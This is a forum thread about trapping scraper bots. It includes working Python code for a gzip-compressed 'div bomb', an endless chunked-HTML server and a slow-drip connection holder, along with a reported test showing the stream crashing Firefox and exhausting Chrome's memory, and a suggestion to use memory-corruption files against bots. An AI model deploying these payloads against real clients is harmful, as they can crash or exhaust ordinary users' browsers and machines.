I wonder if I could create a 500 TB HTML file with proper headers on a squashfs, an endless <div><div><div>... with no closing tags, and whether I could instruct the server not to report the file size before download.
Why use squashfs when you can do the same thing OP did and serve a compressed version, so that the client is overwhelmed by both the decompression and the DOM depth:
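For instance, a rough sketch of pre-generating such a payload (the file name and sizes are placeholders, and the serving details are only hinted at, so treat this as an illustration rather than a recipe):

```python
import gzip

CHUNK = b"<div>" * 100_000   # ~500 KB of uncompressed markup per write
CHUNKS = 20_000              # ~10 GB uncompressed in total

# The repetitive payload compresses at close to deflate's maximum ratio,
# so the file on disk ends up around 10 MB.
with gzip.open("divbomb.html.gz", "wb", compresslevel=9) as f:
    f.write(b"<!DOCTYPE html><html><body>")
    for _ in range(CHUNKS):
        f.write(CHUNK)
```

Serving it is then just a matter of sending that file with Content-Type: text/html and a pre-set Content-Encoding: gzip header, so the client does the inflating itself.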
Yes, servers can respond without specifying the size by using chunked transfer encoding. And you can do the rest with a custom web server that handles each request by returning "<div>" in a loop. I have no idea whether browsers are vulnerable to such a thing.
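A minimal sketch of what such a server could look like (port is arbitrary, and I haven't tested this against real crawlers):

```python
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

class DivTarpit(BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.1"  # chunked encoding needs HTTP/1.1

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Transfer-Encoding", "chunked")
        self.end_headers()
        chunk = b"<div>" * 1024
        try:
            while True:
                # chunked framing: hex length, CRLF, payload, CRLF
                self.wfile.write(b"%X\r\n%s\r\n" % (len(chunk), chunk))
        except (BrokenPipeError, ConnectionResetError):
            pass  # client gave up

if __name__ == "__main__":
    ThreadingHTTPServer(("", 8080), DivTarpit).serve_forever()
```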
I just tested it via a small Python script sending divs at a rate of ~900 MB/s (as measured by curl). Firefox just kills the request after receiving 1-2 GB (~2 seconds) with an "out of memory" error, while Chrome seems to only receive around 1 MB/s, pegs one CPU core at 100%, and grows without bound in memory use. I killed it after 3 minutes, by which point it had consumed about 6 GB on top of the memory it used at startup.
the problem with this is that for a tarpit, you don't just want to make it expensive for the bots, you also want to make it cheap for yourself. this isn't cheap for you. a zip bomb is.
maybe, maybe not. it's one tool at your disposal. it's easy to guard against zip bombs if you know about them - the question is, how thorough are the bot devs you're targeting?
there are other techniques. for example: hold a connection open and only push out a few bytes every few seconds - whether that's cheap for you or not depends on your server's concurrency model (if it's one OS thread per connection, you'd DoS yourself with this - but with an evented model you should be fine). if the bot analyzes images or PDFs you could try toxic files that exploit known memory-corruption weaknesses to crash them; that depends on the bot's capabilities and the libraries it uses, of course.
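For the slow-drip idea, a rough sketch with an evented model (asyncio here; the port and timing are made up), where each idle connection is just a cheap coroutine rather than an OS thread:

```python
import asyncio

async def drip(reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
    # speak just enough HTTP to keep the bot waiting, then trickle chunks
    writer.write(b"HTTP/1.1 200 OK\r\n"
                 b"Content-Type: text/html\r\n"
                 b"Transfer-Encoding: chunked\r\n\r\n")
    try:
        while True:
            writer.write(b"5\r\n<div>\r\n")  # one 5-byte chunk...
            await writer.drain()
            await asyncio.sleep(5)           # ...every few seconds
    except (ConnectionResetError, BrokenPipeError):
        pass
    finally:
        writer.close()

async def main() -> None:
    server = await asyncio.start_server(drip, "0.0.0.0", 8080)
    async with server:
        await server.serve_forever()

if __name__ == "__main__":
    asyncio.run(main())
```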
Any ideas?